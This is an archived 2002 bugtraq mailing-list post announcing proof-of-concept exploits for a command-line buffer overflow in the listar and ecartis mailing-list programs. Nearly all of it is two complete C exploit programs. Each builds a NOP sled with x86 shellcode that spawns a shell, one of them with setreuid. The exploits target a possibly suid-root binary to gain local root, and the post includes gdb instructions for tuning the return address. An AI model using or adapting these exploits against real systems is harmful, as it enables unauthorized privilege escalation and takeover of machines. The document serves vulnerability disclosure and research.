[25263] in bugtraq
ecartis / listar PoC
daemon@ATHENA.MIT.EDU (KF)
Fri Apr 26 00:57:38 2002
Message-ID: <3CC76231.6040106@snosoft.com>
Date: Wed, 24 Apr 2002 18:56:01 -0700
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: vuln-dev@securityfocus.com, bugtraq@securityfocus.com
Content-Type: multipart/mixed;
boundary="------------060401030205080801000406"
--------------060401030205080801000406
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Heres some code for this post a while back ...
http://online.securityfocus.com/archive/82/258763
This is NOT the same issue in the my_strings.c there are MULTIPLE issues
in ecartis still and the same goes for listar...
This issue is a strcpy from argv to a fixed buffer .... nothing special.
ecartis and listar are one in the same... depending on how you install
either one it could be a root exploit or it could be a non priv account
exploit. I have seen alot of listar installs suid root...
-KF
--------------060401030205080801000406
Content-Type: text/plain;
name="listarx.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="listarx.c"
/*
* /home/listar-0.129a/listar
*
* The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
* Exploit coded up by The Itch / Promisc (http://www.promisc.org)
*
* This exploit was developed on the Snosoft vulnerability research machines
*
* - The Itch
* - itchie@promisc.org
*
* - Technical details concerning the exploit -
*
* 1) Buffer overflow occurs after writing 990 bytes into the buffer at the command line
* (990 to overwrite ebp, 996 to overwrite eip).
* 2) The code string with the return address will be unaligned.
*
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1000
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
int get_sp = 0xbffff4e0;
if(argc > 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf("unable to allocate memory for %d bytes\n", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf("unable to allocate memory for %d bytes\n", eggsize);
exit(1);
}
printf("/home/listar-0.129a/listar\n");
printf("Vulnerability found by KF / http://www.snosoft.com\n");
printf("Coded by The Itch / http://www.promisc.org\n\n");
printf("Using return address: 0x%x\n", get_sp);
printf("Using buffersize : %d\n", bsize);
/* alignment */
ptr = buff + 2;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
egg[eggsize - 1] = '\0';
buff[bsize -1] = '\0';
memcpy(buff, "RET=", 4);
memcpy(egg, "EGG=", 4);
putenv(buff);
putenv(egg);
system("/home/listar-0.129a/listar $RET");
return 0;
}
--------------060401030205080801000406
Content-Type: text/plain;
name="ecartisx.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="ecartisx.c"
/*
* /home/ecartis/ecartis
*
* The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
* Exploit coded up by The Itch / Promisc (http://www.promisc.org)
* Shellcode created by r0z / Promisc (r0z@promisc.org)
*
* This exploit was developed on the Snosoft vulnerability research machines
*
* - The Itch
* - itchie@promisc.org
*
* - Technical details concerning the exploit -
*
* 1) Buffer overflow occurs after writing 996 bytes into the buffer at the command line
* (996 to overwrite ebp, 1000 to overwrite eip).
* 2) The code string with the return address will be unaligned.
* 3) Shellcode will try to do a setreuid(508);
*
* I had trouble reaching my own buffer in the enviroment dynamicly, so i gdb'ed it.
* If the exploit fails, comment the system() that runs ecarthis, uncomment the other system()
* The run this exploit, you will be in bash then, do: gdb /home/ecartis/ecartis
* in gdb, type: run $RET
* The program will probably then segfault, then type: x/200x $esp and press enter a couply of times
* until you see alot of 0x90909090. Then pick on of those address and replace it with the
* int get_sp = 0xbffff550. Change the system() commands below back as how they were and rerun the exploit.
*
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1000
/* setreuid(508); execve("/bin/sh", "sh", 0); (c) r0z@promisc.org */
char shellcode[] =
"\x31\xdb" /* xor %ebx, %ebx */
"\x31\xc9" /* xor %ecx, %ecx */
"\xf7\xe3" /* mul %ebx */
"\xb0\x46" /* mov $0x46, %al */
"\x66\xbb\xfc\x01" /* mov $0x1fc, %bx */
"\x49" /* dec %ecx */
"\xcd\x80" /* int $0x80 */
"\x31\xd2" /* xor %edx, %edx */
"\x52" /* push %edx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp, %ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp, %ecx */
"\x6a\x0b" /* pushl $0xb */
"\x58" /* pop %eax */
"\xcd\x80"; /* int $0x80 */
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
int get_sp = 0xbffff550;
if(argc > 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf("unable to allocate memory for %d bytes\n", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf("unable to allocate memory for %d bytes\n", eggsize);
exit(1);
}
printf("/home/ecartis/ecartis\n");
printf("Vulnerability found by KF / http://www.snosoft.com\n");
printf("Coded by The Itch / http://www.promisc.org\n\n");
printf("Using return address: 0x%x\n", get_sp);
printf("Using buffersize : %d\n", bsize);
/* alignment */
ptr = buff + 2;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
buff[bsize - 1] = '\0';
memcpy(buff, "RET=", 4);
putenv(buff);
system("/home/ecartis/ecartis $RET");
// system("/bin/bash");
return 0;
}
--------------060401030205080801000406--
